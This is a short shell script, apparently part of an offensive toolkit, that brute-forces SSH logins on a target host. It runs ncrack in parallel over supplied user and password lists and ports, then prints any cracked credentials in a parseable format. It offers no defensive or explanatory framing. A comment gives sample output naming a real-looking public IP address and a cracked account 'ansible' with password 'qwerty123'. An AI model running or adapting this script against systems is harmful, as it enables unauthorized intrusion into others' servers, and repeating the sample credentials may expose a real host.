#!/bin/sh

TARGET="$1"
USER_LIST="$2"
PASS_LIST="$3"
FIRST_MATCH="$4"
[ -z "$FIRST_MATCH" ] && FIRST_MATCH="yes"
PORTS="$5"

ORIGIN="$(readlink -f "$0" | xargs dirname)"
export PATH="$ORIGIN:$PATH"

get_ports() {
    if [ -z "$PORTS" ]
    then
        cat -
    else
        echo "$PORTS"
    fi
}

BRUT_SSH_PASS='
    export NCRACKDIR=.
    while read user
    do
        ncrack --datadir "$(which ncrack)" \
            -T 5 "ssh://'"$TARGET"'" \
            -u "$user" \
            -P "'"$PASS_LIST"'" \
            -p "ssh:XXX" 2>&1 | grep -E -m 1 -H --label="$user:XXX" " ssh: " \
                && [ '"$FIRST_MATCH"' = "yes" ] && break
    done < "'"$USER_LIST"'"
'

# ansible:22:94.130.57.15 22/tcp ssh: 'ansible' 'qwerty123'
get_ports | sed 's/*://g' | xargs -P 16 -IXXX -n 1 -r sh -c "$BRUT_SSH_PASS" | tr -d '\r' | \
    awk -F "[:']+" '{print "SSH_PASS_ACCESS:"$1":"$2":"$7}'
